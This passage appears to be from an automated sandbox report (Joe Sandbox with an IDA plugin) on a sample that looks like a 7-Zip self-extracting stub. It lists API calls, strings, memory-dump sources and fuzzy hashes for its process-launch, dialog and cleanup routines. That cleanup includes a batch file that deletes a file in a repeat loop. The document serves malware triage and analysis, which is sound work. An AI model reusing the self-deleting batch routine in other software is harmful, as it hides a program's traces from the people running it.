                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040516A
                                                                                          • GetStartupInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405183
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000001,01000004,00000000,00000044,?), ref: 004051AA
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 004051B4
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004051BF
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004051C7
                                                                                          • CreateJobObjectW.KERNEL32(00000000,00000000), ref: 004051DC
                                                                                          • AssignProcessToJobObject.KERNEL32(00000000,?), ref: 004051F3
                                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000001,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00405203
                                                                                          • SetInformationJobObject.KERNEL32(?,00000007,?,00000008), ref: 00405224
                                                                                          • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040522D
                                                                                          • GetQueuedCompletionStatus.KERNEL32(00000000,?,?,?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040524C
                                                                                          • ResumeThread.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405255
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,00000000), ref: 0040525C
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040526B
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00405274
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040527F
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0040528B
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00405292
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040529D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$CloseHandleObject$CreateProcess$CompletionErrorLastResumeThread$AssignCodeCommandExitInfoInformationLinePortQueuedSingleStartupStatusWait
                                                                                          • String ID: " -$sfxwaitall
                                                                                          • API String ID: 2734624574-3991362806
                                                                                          • Opcode ID: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
                                                                                          • Instruction ID: b3327515afe2f0509fed3fa0d446ddd4546a9b02c844584286d91d1d95b89973
                                                                                          • Opcode Fuzzy Hash: 643fa3cc5beeae6f8d39527fc6abcbdd7a7791ff37a5eeb50854b5f684dbaa86
                                                                                          • Instruction Fuzzy Hash: 73614DB2800148BBDF11BFA1DC45EDF3B6CFF54308F10853AFA15A21A1DA399A559F68
                                                                                          APIs
                                                                                          • GetDriveTypeW.KERNEL32(?,?,00000000), ref: 0040534B
                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0040537C
                                                                                          • WriteFile.KERNEL32(00419858,?,?,00406D05,00000000,del ",:Repeat,00000000), ref: 00405431
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040543C
                                                                                          • CloseHandle.KERNEL32(00419858), ref: 00405445
                                                                                          • SetFileAttributesW.KERNEL32(00406D05,00000000), ref: 0040545C
                                                                                          • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0040546E
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405477
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405483
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00406D05,?), ref: 00405489
                                                                                          • ??3@YAXPAX@Z.MSVCRT(00406D05,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00406D05,00419858), ref: 004054B7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                                                          • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                                                          • API String ID: 3007203151-3467708659
                                                                                          • Opcode ID: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
                                                                                          • Instruction ID: d0d69a7dd8ff82dd971fb120c5bc6d20105d604efb913bdcb2d31d3208e79299
                                                                                          • Opcode Fuzzy Hash: 13b319529610c754c5bab4c01b5e1152ea1f27b0a7c92a127f226609597e94be
                                                                                          • Instruction Fuzzy Hash: 8E418E31C00109BADB11ABA0DC86DEF7779EF14319F50802AF515761E1EB785E86DB68
                                                                                          APIs
                                                                                          • GetClassNameA.USER32(?,?,00000040), ref: 00403140
                                                                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00403153
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00403160
                                                                                            • Part of subcall function 004030EA: GetWindowTextLengthW.USER32(?), ref: 004030FB
                                                                                            • Part of subcall function 004030EA: GetWindowTextW.USER32(t1@,00000000,00000001), ref: 00403118
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040318D
                                                                                          • GetParent.USER32(?), ref: 0040319B
                                                                                          • LoadLibraryA.KERNEL32(riched20), ref: 004031AF
                                                                                          • GetMenu.USER32(?), ref: 004031C2
                                                                                          • SetThreadLocale.KERNEL32(00000419), ref: 004031CF
                                                                                          • CreateWindowExW.USER32(00000000,RichEdit20W,004154C8,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 004031FF
                                                                                          • DestroyWindow.USER32(?), ref: 00403210
                                                                                          • SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00403225
                                                                                          • GetSysColor.USER32(0000000F), ref: 00403229
                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00403237
                                                                                          • SendMessageW.USER32(00000000,00000461,?,?), ref: 00403262
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?), ref: 00403267
                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 0040326F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$??3@MessageSend$Text$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
                                                                                          • String ID: RichEdit20W$STATIC$riched20${\rtf
                                                                                          • API String ID: 3514532227-2281146334
                                                                                          • Opcode ID: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
                                                                                          • Instruction ID: 373b527b6ca097a0cf97d4fb6958eb329f6bb70dd43407f4b4eeb9307f1859e1
                                                                                          • Opcode Fuzzy Hash: 6f4647c99caaab53e68a714a11fc1007a8fa1957a86f658c4333d53be50d8091
                                                                                          • Instruction Fuzzy Hash: 61319E72900509FFDB01AFA4DC49EEF7BBDAF48716F108036F605F6190DA788A418B68
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                                          • LoadIconW.USER32(00000000), ref: 00408717
                                                                                          • GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                                          • GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                                          • LoadImageW.USER32(00000000), ref: 0040873C
                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                                          • GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                                          • GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                                          • GetWindow.USER32(?,00000005), ref: 004088C3
                                                                                          • GetWindow.USER32(?,00000005), ref: 004088DF
                                                                                          • GetWindow.USER32(?,00000005), ref: 004088F7
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,00408AB5), ref: 00408957
                                                                                          • LoadIconW.USER32(00000000), ref: 0040895E
                                                                                          • GetDlgItem.USER32(?,000004B1), ref: 0040897D
                                                                                          • SendMessageW.USER32(00000000), ref: 00408980
                                                                                            • Part of subcall function 00407B0D: GetDlgItem.USER32(?,?), ref: 00407B17
                                                                                            • Part of subcall function 00407B0D: GetWindowTextLengthW.USER32(00000000), ref: 00407B1E
                                                                                            • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                                            • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Item$Long$HandleLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                                                                          • String ID:
                                                                                          • API String ID: 3694754696-0
                                                                                          • Opcode ID: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                                          • Instruction ID: ec505544c7bb35dede6d5bcefb07895398d021ded876e535e02418492f258e54
                                                                                          • Opcode Fuzzy Hash: 8792f65208e43fda3f0ae599c7562791de8770737c82b3f6a889dddbd826b917
                                                                                          • Instruction Fuzzy Hash: D671F8B1344705ABE6117B619E4AF3B7659DB80714F10443EF6827A2E2CFBCAC018A5E
                                                                                          APIs
                                                                                          • lstrcmpiW.KERNEL32(00000000,004166B8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404BE2
                                                                                            • Part of subcall function 00402187: GetLastError.KERNEL32(00000000,00000020,-00000002), ref: 004021D6
                                                                                            • Part of subcall function 00402187: wsprintfW.USER32 ref: 004021E7
                                                                                            • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004021FC
                                                                                            • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402201
                                                                                            • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040221C
                                                                                            • Part of subcall function 00402187: GetEnvironmentVariableW.KERNEL32(?,00000000,00000004), ref: 0040222F
                                                                                            • Part of subcall function 00402187: GetLastError.KERNEL32 ref: 00402236
                                                                                            • Part of subcall function 00402187: lstrcmpiW.KERNEL32(00AA9848,00404926), ref: 0040224B
                                                                                            • Part of subcall function 00402187: ??3@YAXPAX@Z.MSVCRT(00AA9848), ref: 0040225B
                                                                                            • Part of subcall function 00402187: SetLastError.KERNEL32(?), ref: 00402282
                                                                                            • Part of subcall function 00402187: lstrlenA.KERNEL32(00416208), ref: 004022B6
                                                                                            • Part of subcall function 00402187: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004022D1
                                                                                            • Part of subcall function 00402187: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402303
                                                                                          • _wtol.MSVCRT ref: 00404CDF
                                                                                          • _wtol.MSVCRT ref: 00404CFB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
                                                                                          • String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle
                                                                                          • API String ID: 2725485552-1675048025
                                                                                          • Opcode ID: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                                          • Instruction ID: efab4658e061a586f4080eb8d96ca385680a2b42527defa3ddb57561e196b8fa
                                                                                          • Opcode Fuzzy Hash: 07b1172011b0cd173d857418f64cc138280eef6e6d3e42432808643f3bcd4bbd
                                                                                          • Instruction Fuzzy Hash: F151B8F6E01104BADB11AF616D8ADEF36ACDE41708725443FF904F22C2E6BD8E85466D
                                                                                          APIs
                                                                                          • GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                                          • MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                                          • MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                                          • SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                                          • GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                                          • SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                                          • DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                                          • DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00401FC5
                                                                                          • CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401FD2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3462224810-0
                                                                                          • Opcode ID: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                                          • Instruction ID: f87cdcd409c0e6d8f104c470e9418599ce0c3db21cc9cfda4b735dde8093d4f2
                                                                                          • Opcode Fuzzy Hash: bc7c6b49b760a043a5ca8b23895b80fbacfe81e10fbdf0cdd542d6a2194e7bcc
                                                                                          • Instruction Fuzzy Hash: B0310676D40208FFDF115BE1DD48EEF7FB9EB88761F108066FA04A61A0C6754A50AFA4
                                                                                          APIs
                                                                                          • GetClassNameA.USER32(?,?,00000040), ref: 00401FEF
                                                                                          • lstrcmpiA.KERNEL32(?,STATIC), ref: 00402006
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00402019
                                                                                          • GetMenu.USER32(?), ref: 0040202E
                                                                                            • Part of subcall function 00401DC9: GetModuleHandleW.KERNEL32(00000000), ref: 00401DD4
                                                                                            • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401DF1
                                                                                            • Part of subcall function 00401DC9: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401E05
                                                                                            • Part of subcall function 00401DC9: SizeofResource.KERNEL32(00000000,00000000), ref: 00401E16
                                                                                            • Part of subcall function 00401DC9: LoadResource.KERNEL32(00000000,00000000), ref: 00401E20
                                                                                            • Part of subcall function 00401DC9: LockResource.KERNEL32(00000000), ref: 00401E2B
                                                                                          • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00402060
                                                                                          • memcpy.MSVCRT(00000000,00000000,00000010), ref: 0040206D
                                                                                          • CoInitialize.OLE32(00000000), ref: 00402076
                                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00402082
                                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00416E50,?), ref: 004020A7
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 004020B7
                                                                                            • Part of subcall function 00401EB2: GetWindowDC.USER32(00000000), ref: 00401EBE
                                                                                            • Part of subcall function 00401EB2: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401ECA
                                                                                            • Part of subcall function 00401EB2: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401EE3
                                                                                            • Part of subcall function 00401EB2: GetObjectW.GDI32(?,00000018,?), ref: 00401F12
                                                                                            • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F1D
                                                                                            • Part of subcall function 00401EB2: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401F27
                                                                                            • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F35
                                                                                            • Part of subcall function 00401EB2: CreateCompatibleDC.GDI32(?), ref: 00401F3C
                                                                                            • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F4A
                                                                                            • Part of subcall function 00401EB2: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401F58
                                                                                            • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,00000000), ref: 00401F60
                                                                                            • Part of subcall function 00401EB2: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401F68
                                                                                            • Part of subcall function 00401EB2: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401F87
                                                                                            • Part of subcall function 00401EB2: GetCurrentObject.GDI32(00000000,00000007), ref: 00401F90
                                                                                            • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401F9D
                                                                                            • Part of subcall function 00401EB2: SelectObject.GDI32(00000000,?), ref: 00401FA3
                                                                                            • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAC
                                                                                            • Part of subcall function 00401EB2: DeleteDC.GDI32(00000000), ref: 00401FAF
                                                                                            • Part of subcall function 00401EB2: ReleaseDC.USER32(00000000,?), ref: 00401FB6
                                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 004020E9
                                                                                          • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 004020FD
                                                                                          • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 0040210F
                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00402124
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                                                                          • String ID: IMAGES$STATIC
                                                                                          • API String ID: 4202116410-1168396491
                                                                                          • Opcode ID: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                                          • Instruction ID: 87364bf851807a9d3783278cfb79ffb10547d227827cc6f6944e766e6ae994b9
                                                                                          • Opcode Fuzzy Hash: b54bb7280c56bf500d59ef5ed5a6444fd67b84fc2872fad343f2864c8519ddee
                                                                                          • Instruction Fuzzy Hash: 00418F31900108FFCB119FA0DC4CEEF7F79EF49741B008065FA05A61A0D7798A55DB64
                                                                                          APIs
                                                                                            • Part of subcall function 004071DA: GetDlgItem.USER32(?,?), ref: 004071E7
                                                                                            • Part of subcall function 004071DA: ShowWindow.USER32(00000000,?), ref: 004071FE
                                                                                          • GetDlgItem.USER32(?,000004B8), ref: 00408B63
                                                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408B72
                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00408BB9
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00408BBE
                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00408BCE
                                                                                          • SetWindowLongW.USER32(00000000), ref: 00408BD1
                                                                                          • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 00408BF7
                                                                                          • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408C09
                                                                                          • GetDlgItem.USER32(?,000004B4), ref: 00408C13
                                                                                          • SetFocus.USER32(00000000), ref: 00408C16
                                                                                          • SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408C45
                                                                                          • CoCreateInstance.OLE32(00416E80,00000000,00000001,00416B08,?), ref: 00408C69
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00408C86
                                                                                          • IsWindow.USER32(00000000), ref: 00408C89
                                                                                          • GetDlgItem.USER32(?,00000002), ref: 00408C99
                                                                                          • EnableWindow.USER32(00000000), ref: 00408C9C
                                                                                          • GetDlgItem.USER32(?,000004B5), ref: 00408CB0
                                                                                          • ShowWindow.USER32(00000000), ref: 00408CB3
                                                                                            • Part of subcall function 00407A3B: GetDlgItem.USER32(?,000004B6), ref: 00407A49
                                                                                            • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,00408AB5), ref: 00408714
                                                                                            • Part of subcall function 004086EB: LoadIconW.USER32(00000000), ref: 00408717
                                                                                            • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000032), ref: 0040872B
                                                                                            • Part of subcall function 004086EB: GetSystemMetrics.USER32(00000031), ref: 00408730
                                                                                            • Part of subcall function 004086EB: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,00408AB5), ref: 00408739
                                                                                            • Part of subcall function 004086EB: LoadImageW.USER32(00000000), ref: 0040873C
                                                                                            • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000001,?), ref: 0040875C
                                                                                            • Part of subcall function 004086EB: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00408765
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 00408781
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B2), ref: 0040878B
                                                                                            • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 00408797
                                                                                            • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087A6
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087B4
                                                                                            • Part of subcall function 004086EB: GetDlgItem.USER32(?,000004B5), ref: 004087C2
                                                                                            • Part of subcall function 004086EB: GetWindowLongW.USER32(?,000000F0), ref: 004087CE
                                                                                            • Part of subcall function 004086EB: SetWindowLongW.USER32(?,000000F0,00000000), ref: 004087DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.3192997034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.3192972611.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193036793.0000000000415000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193069018.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.3193104545.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_7q551ugrWe.jbxd
                                                                                          Similarity
                                                                                          • API ID: Item$Window$Long$MessageSendSystem$EnableHandleLoadMenuMetricsModuleShow$CreateFocusIconImageInstanceTimer
                                                                                          • String ID:
                                                                                          • API String ID: 1057135554-0
                                                                                          • Opcode ID: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                                          • Instruction ID: 260128caa5a256333788f33680fc13296caa9e9ac1428af8f37f53b95f277c78
                                                                                          • Opcode Fuzzy Hash: 4c11372e592c7ee729e35fc86577e60408999ac1414f6f050f9cdca6ecb8968b
                                                                                          • Instruction Fuzzy Hash: E1415B71644708EBDA246F26DE49F977BADEB80B54F00853DF555A62E0CF79AC00CA2C
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000004B3), ref: 0040731D
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 00407322
                                                                                          • GetDlgItem.USER32(?,000004B4), ref: 00407359
                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0040735E
                                                                                          • GetSystemMetrics.USER32(00000010), ref: 004073E0
                                                                                          • GetSystemMetrics.USER32(00000011), ref: 004073E6
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 004073ED
                                                                                          • GetSystemMetrics.USER32(00000007), ref: 004073F4
